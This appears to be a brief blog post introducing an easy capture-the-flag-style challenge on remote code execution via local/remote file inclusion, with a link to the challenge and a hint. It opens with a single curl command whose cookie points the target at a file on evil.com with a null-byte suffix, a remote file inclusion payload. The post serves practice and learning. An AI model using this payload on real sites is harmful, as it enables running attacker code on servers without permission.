Day 3

Worpress:~ TheZakMan$: curl http://localhost.com/pg.php -b “pref_file=http://evil.com/Day3.txt%00″


 

Today I stumbled into something old but gold Zixem’s challenges page.

For some of you that never done it here is a easy and quick challange based on Remote Code Execution (RCE) exploiting the LFI/RFI vulnerability.

 

http://zixem.altervista.org/level1.php


 

The hint is pretty clear, you are looking AT it.

 

 

Deixe um comentário